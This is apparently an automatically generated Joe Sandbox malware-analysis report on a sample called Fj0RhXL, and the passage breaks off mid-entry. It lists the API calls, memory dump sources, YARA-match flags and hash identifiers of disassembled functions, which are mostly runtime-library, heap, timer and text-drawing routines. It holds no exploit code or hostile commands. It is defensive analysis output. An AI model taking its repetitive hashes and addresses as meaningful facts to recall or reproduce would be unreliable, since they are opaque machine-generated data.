                                          • Instruction Fuzzy Hash: F81103B0A01B059FD724CFB4C584A96BBF9BF8C341B95896DE65E87240EB30E801CB40
                                          APIs
                                          • timeGetTime.WINMM(00000001,?,00000001,?,03D83C1F,?,?,00000001), ref: 03D84AF5
                                          • InterlockedIncrement.KERNEL32(00000001), ref: 03D84B04
                                          • InterlockedIncrement.KERNEL32(00000001), ref: 03D84B11
                                          • timeGetTime.WINMM(?,03D83C1F,?,?,00000001), ref: 03D84B28
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: IncrementInterlockedTimetime
                                          • String ID:
                                          • API String ID: 159728177-0
                                          • Opcode ID: fb90e9b80ce311046df9cf612fae7ee19f1e8ca0d4fe1b5778ad9ce7f668af94
                                          • Instruction ID: 6fa930af90182f33d24cb7554b2eb15818b4b28d2c1bd2825db9c50ae60ebb5d
                                          • Opcode Fuzzy Hash: fb90e9b80ce311046df9cf612fae7ee19f1e8ca0d4fe1b5778ad9ce7f668af94
                                          • Instruction Fuzzy Hash: DD01C8B66007099FC720EF6AD88094AFBF9FF58750700892EE549C7710E674E6448FA0
                                          APIs
                                          • ____lc_handle_func.LIBCMT ref: 03D9A039
                                            • Part of subcall function 03D9F8D8: __getptd.LIBCMT ref: 03D9F8D8
                                          • ____lc_collate_cp_func.LIBCMT ref: 03D9A041
                                            • Part of subcall function 03D9F8B2: __getptd.LIBCMT ref: 03D9F8B2
                                          • _memcmp.LIBCMT ref: 03D9A060
                                          • ___crtCompareStringA.LIBCMT ref: 03D9A08C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __getptd$CompareString____lc_collate_cp_func____lc_handle_func___crt_memcmp
                                          • String ID:
                                          • API String ID: 2928985310-0
                                          • Opcode ID: ee3c72d4a8a98b572a525827f552e7c8848a8a272a4a8748430edfeb98e83d8a
                                          • Instruction ID: f48f7cb6cf7a61a1c81fc4014ba80bf0ff0400b063fb754e1b23b3cedddd5023
                                          • Opcode Fuzzy Hash: ee3c72d4a8a98b572a525827f552e7c8848a8a272a4a8748430edfeb98e83d8a
                                          • Instruction Fuzzy Hash: 21F0A4776002056AFF21AA59CC49BAE765CDF40650F060253F92D8E058E62288714760
                                          APIs
                                          • timeGetTime.WINMM(00000001,?,00000001,?,02F03C3F,?,?,00000001), ref: 02F04AE5
                                          • InterlockedIncrement.KERNEL32(00000001), ref: 02F04AF4
                                          • InterlockedIncrement.KERNEL32(00000001), ref: 02F04B01
                                          • timeGetTime.WINMM(?,02F03C3F,?,?,00000001), ref: 02F04B18
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: IncrementInterlockedTimetime
                                          • String ID:
                                          • API String ID: 159728177-0
                                          • Opcode ID: 48725d755c3d83c63c7bd689270eb3e62da8e45a50d5a1dd6f93579d5d575d36
                                          • Instruction ID: 961aa20dbd6850b219ff02173da5aa4f042016807cd55a10c8cf371ae141ca99
                                          • Opcode Fuzzy Hash: 48725d755c3d83c63c7bd689270eb3e62da8e45a50d5a1dd6f93579d5d575d36
                                          • Instruction Fuzzy Hash: FE01DAB5A007099FC760DFAAD88094AFBF9BF58750741892EE649C7610E774E6448FE0
                                          APIs
                                          • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03D83637
                                          • _free.LIBCMT ref: 03D8366C
                                            • Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
                                            • Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C
                                          • _malloc.LIBCMT ref: 03D836A7
                                          • _memset.LIBCMT ref: 03D836B5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                          • String ID:
                                          • API String ID: 3340475617-0
                                          • Opcode ID: 1fcd75cc0ea2f49dc78cbcb23c3ae0ec1d3ec973c5fa081e7e8d105998a26007
                                          • Instruction ID: d31b36f4a9aa09e04bc4bfc61313e799b10bf6f8fc7edb7aba7c2c92d60160c5
                                          • Opcode Fuzzy Hash: 1fcd75cc0ea2f49dc78cbcb23c3ae0ec1d3ec973c5fa081e7e8d105998a26007
                                          • Instruction Fuzzy Hash: 4501DAF5900B04DFE760DF7A8881B97FAE9EB85358F15482ED5AE87301D634A8048F60
                                          APIs
                                          • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02F03657
                                          • _free.LIBCMT ref: 02F0368C
                                            • Part of subcall function 02F06F59: RtlFreeHeap.NTDLL(00000000,00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06F6F
                                            • Part of subcall function 02F06F59: GetLastError.KERNEL32(00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000), ref: 02F06F81
                                          • _malloc.LIBCMT ref: 02F036C7
                                          • _memset.LIBCMT ref: 02F036D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                          • String ID:
                                          • API String ID: 3340475617-0
                                          • Opcode ID: c9a3a062697756028e6ff23e9e117e9bb81c626b092a279b7ef7ac7617d4c7be
                                          • Instruction ID: bbba2845a97fcdbfb359b441e644aa74330129724d2c595361be38e2a67e630b
                                          • Opcode Fuzzy Hash: c9a3a062697756028e6ff23e9e117e9bb81c626b092a279b7ef7ac7617d4c7be
                                          • Instruction Fuzzy Hash: 5B01C8B1900B04DFE3609F7A98C1B97BAE9EB85354F10482EE5AEC7341D630A8049F60
                                          APIs
                                          • _malloc.LIBCMT ref: 032B6A0E
                                            • Part of subcall function 032B6960: __FF_MSGBANNER.LIBCMT ref: 032B6979
                                            • Part of subcall function 032B6960: __NMSG_WRITE.LIBCMT ref: 032B6980
                                          • std::exception::exception.LIBCMT ref: 032B6A43
                                          • std::exception::exception.LIBCMT ref: 032B6A5D
                                          • __CxxThrowException@8.LIBCMT ref: 032B6A6E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8Throw_malloc
                                          • String ID:
                                          • API String ID: 2388904642-0
                                          • Opcode ID: c5dba215bafa20b511687e2302b221ec5ae919bf628af2018c75bf268600f4ea
                                          • Instruction ID: 645a63029200b916c727e8329c8be61275ae02adef6587d07c34812de4c5443c
                                          • Opcode Fuzzy Hash: c5dba215bafa20b511687e2302b221ec5ae919bf628af2018c75bf268600f4ea
                                          • Instruction Fuzzy Hash: 8DF0F435520389AADF10EB94CC80AEDBBFAEB42780F144419E500AE0D1CFF1C9C48B84
                                          APIs
                                            • Part of subcall function 03D81430: HeapFree.KERNEL32(?,00000000,?,?,?,03D84081,?,?,74DEDFA0,03D83618), ref: 03D8144D
                                            • Part of subcall function 03D81430: _free.LIBCMT ref: 03D81469
                                          • HeapDestroy.KERNEL32(00000000), ref: 03D97A63
                                          • HeapCreate.KERNEL32(?,?,?), ref: 03D97A75
                                          • _free.LIBCMT ref: 03D97A85
                                          • HeapDestroy.KERNEL32 ref: 03D97AB2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Destroy_free$CreateFree
                                          • String ID:
                                          • API String ID: 4097506873-0
                                          • Opcode ID: 1edc62280f5361cd23a0eddfc91f6bf083c2a80c15568e19dcaf80ec34db11b3
                                          • Instruction ID: a18e328ee41d33053c0076e4d22f66d62d058d11ff561b2ef132d1ae80c67fed
                                          • Opcode Fuzzy Hash: 1edc62280f5361cd23a0eddfc91f6bf083c2a80c15568e19dcaf80ec34db11b3
                                          • Instruction Fuzzy Hash: E1F03CB6100602DBEB10DF28D808B17F7B8FF40B10F148919E9A9C7344E735E511CBA0
                                          APIs
                                            • Part of subcall function 02F01420: HeapFree.KERNEL32(?,00000000,?,?,?,02F040A1,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F0143D
                                            • Part of subcall function 02F01420: _free.LIBCMT ref: 02F01459
                                          • HeapDestroy.KERNEL32(00000000), ref: 02F065A3
                                          • HeapCreate.KERNEL32(?,?,?), ref: 02F065B5
                                          • _free.LIBCMT ref: 02F065C5
                                          • HeapDestroy.KERNEL32 ref: 02F065F2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Heap$Destroy_free$CreateFree
                                          • String ID:
                                          • API String ID: 4097506873-0
                                          • Opcode ID: 81aa96420a0f0816b3bf74b39da31ad4a446ea5bfe2ea25acbaa29f7c4b94128
                                          • Instruction ID: 9adbdbdcf83190170d5f7e0fcde7fbac0d71e1165f0d8795cf3225e38d1c320d
                                          • Opcode Fuzzy Hash: 81aa96420a0f0816b3bf74b39da31ad4a446ea5bfe2ea25acbaa29f7c4b94128
                                          • Instruction Fuzzy Hash: 53F019B59007029BD7109F24E948B27FBB9BF84B95F51491CEA59C3280DB34E8619B90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: recv sn=%lu
                                          • API String ID: 0-1144994348
                                          • Opcode ID: 6aa2123e59ff28b843b38d3f9eb7334d3540eeb311f97c9c17753f8081efcdc7
                                          • Instruction ID: b3e297c1a72dd25c09bc930a072afe360f3b15b30ad72d8033aafff2c77dd3e0
                                          • Opcode Fuzzy Hash: 6aa2123e59ff28b843b38d3f9eb7334d3540eeb311f97c9c17753f8081efcdc7
                                          • Instruction Fuzzy Hash: 5F5178756007059FC710EF69C580B9AB7F9FF49720F1486A9D85A8B740E731F94ACB90
                                          APIs
                                          • _fprintf.LIBCMT ref: 6C3CEDFC
                                            • Part of subcall function 6C3CD9DD: CreateFontA.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000002,00000052,Ariel), ref: 6C3CDA11
                                            • Part of subcall function 6C3CD9DD: SelectObject.GDI32(00000000,?), ref: 6C3CDA31
                                            • Part of subcall function 6C3CD9DD: GetTextExtentPointW.GDI32(?,00000001,?), ref: 6C3CDA54
                                            • Part of subcall function 6C3CD9DD: GetTextColor.GDI32 ref: 6C3CDA60
                                            • Part of subcall function 6C3CD9DD: SetTextColor.GDI32 ref: 6C3CDA81
                                            • Part of subcall function 6C3CD9DD: SetBkMode.GDI32(00000001), ref: 6C3CDA91
                                            • Part of subcall function 6C3CD9DD: TextOutW.GDI32(?,?,?,00000001), ref: 6C3CDAB8
                                            • Part of subcall function 6C3CD9DD: SetBkMode.GDI32(?), ref: 6C3CDAC7
                                            • Part of subcall function 6C3CD9DD: SetTextColor.GDI32(?), ref: 6C3CDAD2
                                            • Part of subcall function 6C3CD9DD: SelectObject.GDI32(?), ref: 6C3CDADD
                                            • Part of subcall function 6C3CD9DD: DeleteObject.GDI32(?), ref: 6C3CDAE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Text$ColorObject$ModeSelect$CreateDeleteExtentFontPoint_fprintf
                                          • String ID: %d %d(%d)center$HO;l
                                          • API String ID: 3349247825-3976141243
                                          • Opcode ID: 445de40db52d904f23cdb52802cc4fe1fa4c424cd1d0026e5882750d59d56c4e
                                          • Instruction ID: 35e13ff6cfd17cc0904a93faf058901eb8717290db4c604c320fc9a4f8d65c82
                                          • Opcode Fuzzy Hash: 445de40db52d904f23cdb52802cc4fe1fa4c424cd1d0026e5882750d59d56c4e
                                          • Instruction Fuzzy Hash: 1841F276744314ABDB00BF24C846AAD3B76E75632CF258056F544CAA90E732C9558FD3
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: -_____$RR____
                                          • API String ID: 1467051239-1029923009
                                          • Opcode ID: 446a3ddb89507890b8321c6ffe096f24fd5f0d1cf4e29cd95aafb592f9f10d12
                                          • Instruction ID: 799f035ff01f5748d9b396e2afb65ccbbc2fe089056a986c8a1c021b42c09501
                                          • Opcode Fuzzy Hash: 446a3ddb89507890b8321c6ffe096f24fd5f0d1cf4e29cd95aafb592f9f10d12
                                          • Instruction Fuzzy Hash: B841D97231E9D089DF31EA1984F4AFC3AB1575331CF68051EC08986985D75FC489AF3A
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A138
                                          • _memmove.LIBCMT ref: 03D8A184
                                            • Part of subcall function 03D89C70: std::_Xinvalid_argument.LIBCPMT ref: 03D89C8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                          • String ID: string too long
                                          • API String ID: 2168136238-2556327735
                                          • Opcode ID: 312b93047084d41d13a765e83078fe7f4aa2208b662793a70081f2e25761f108
                                          • Instruction ID: 0d7614e9ceaac89199d8571eaf8f4c7d1e0605528ac7887c5ad71b3957881d19
                                          • Opcode Fuzzy Hash: 312b93047084d41d13a765e83078fe7f4aa2208b662793a70081f2e25761f108
                                          • Instruction Fuzzy Hash: D521A3717047409BE721EB5CAC80A2AF7EEEB91A50B24091BF096CB791D772FC54C3A5
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A748
                                          • _memmove.LIBCMT ref: 03D8A77B
                                            • Part of subcall function 03D8AD20: std::_Xinvalid_argument.LIBCPMT ref: 03D8AD39
                                            • Part of subcall function 03D8AD20: std::_Xinvalid_argument.LIBCPMT ref: 03D8AD57
                                            • Part of subcall function 03D8AD20: _memmove.LIBCMT ref: 03D8AD9B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                          • String ID: string too long
                                          • API String ID: 2168136238-2556327735
                                          • Opcode ID: 92482fad26a5626dd222f4318c93095c4cffef6d89ce698379f2b1bd40cf46a1
                                          • Instruction ID: d0a73dfed07b9244b6a4f57e39f3e29b862a29fb07765b271fcaf626d633f3ef
                                          • Opcode Fuzzy Hash: 92482fad26a5626dd222f4318c93095c4cffef6d89ce698379f2b1bd40cf46a1
                                          • Instruction Fuzzy Hash: F9217A36301206AF8718EF6CECD0C69B3BAFBC5625354412FE5028B650DB71B955D7A0
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A634
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D8A67C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                          • String ID: string too long
                                          • API String ID: 1785806476-2556327735
                                          • Opcode ID: 72c207d899263832d81ac1a1d8977f0e5f7c010a7f3885a597b92dc55f55b0d1
                                          • Instruction ID: 46322826d7aa2653be820b4024165a0cdecb71664203abfc8493c83f739d072d
                                          • Opcode Fuzzy Hash: 72c207d899263832d81ac1a1d8977f0e5f7c010a7f3885a597b92dc55f55b0d1
                                          • Instruction Fuzzy Hash: 6A11E672504B109FEB20FF7CA8C1A6FB3DCEF50614F140A2FE09787685D721B44886A4
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: @
                                          • API String ID: 4104443479-2766056989
                                          • Opcode ID: 08d8ba2eeb2db836fa0e89e9ba6b1369420d555085f22cf98a88c2b66ddd5250
                                          • Instruction ID: f258a3291f0985941d22b22ade136bba42ccc2bc0ec3d197b820a5f1a9a9f161
                                          • Opcode Fuzzy Hash: 08d8ba2eeb2db836fa0e89e9ba6b1369420d555085f22cf98a88c2b66ddd5250
                                          • Instruction Fuzzy Hash: 4D11E9BAA00304AFDB14DF98D8C0AAE73FEEB94204F50056ED5078B601EB74DA05C7A1
                                          APIs
                                          • __output_l.LIBCMT ref: 032B6B02
                                            • Part of subcall function 032B6BEA: __getptd_noexit.LIBCMT ref: 032B6BEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__output_l
                                          • String ID: B
                                          • API String ID: 2141734944-1255198513
                                          • Opcode ID: 8c3024f2d0b3077bcdd9701ae524abb7291b2c069da38e32abac73d6cafc8205
                                          • Instruction ID: f32c5ee65f7ddfec9c4a820426f04330df5dc09ccce39e6b54827b7201ffee1f
                                          • Opcode Fuzzy Hash: 8c3024f2d0b3077bcdd9701ae524abb7291b2c069da38e32abac73d6cafc8205
                                          • Instruction Fuzzy Hash: FD016D75A1024AABDF00DFA4DC00BEEBBB8EB043A4F044159E924BA280E774D581CBA5
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A29F
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
                                            • Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F
                                          • _memmove.LIBCMT ref: 03D8A2D5
                                          Strings
                                          • invalid string position, xrefs: 03D8A29A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                          • String ID: invalid string position
                                          • API String ID: 1785806476-1799206989
                                          • Opcode ID: 462349321d65ed0887b6135724028193065cfc33e7c7c8ea66be3d2a8ef04812
                                          • Instruction ID: 9019e6a744ca6bb4b5c52d197beb49687fc3d4704bb52918dd2bfe5405d0223a
                                          • Opcode Fuzzy Hash: 462349321d65ed0887b6135724028193065cfc33e7c7c8ea66be3d2a8ef04812
                                          • Instruction Fuzzy Hash: 14018F317006018FD335EBACE89072AB2E6DBC45047295A2ED182CB749D6B2F95283A0
                                          APIs
                                          • _sprintf.LIBCMT ref: 6C370CD8
                                          • _sprintf.LIBCMT ref: 6C370CE9
                                            • Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__output_l
                                          • String ID: %%.%df
                                          • API String ID: 1830584065-883532698
                                          • Opcode ID: feedece06adc70c401fd8d3c09e5addf924b3a87738e725911755a13f51d5815
                                          • Instruction ID: 479b2c097068a527f1ee74c3367358e5db523d5d95d2296ce10321e22114b86b
                                          • Opcode Fuzzy Hash: feedece06adc70c401fd8d3c09e5addf924b3a87738e725911755a13f51d5815
                                          • Instruction Fuzzy Hash: FB014CB29042C9AFDF16EB34C8405DD7F98DF09208F154499D0818B941CB7AE585CB76
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8A814
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D8A84D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
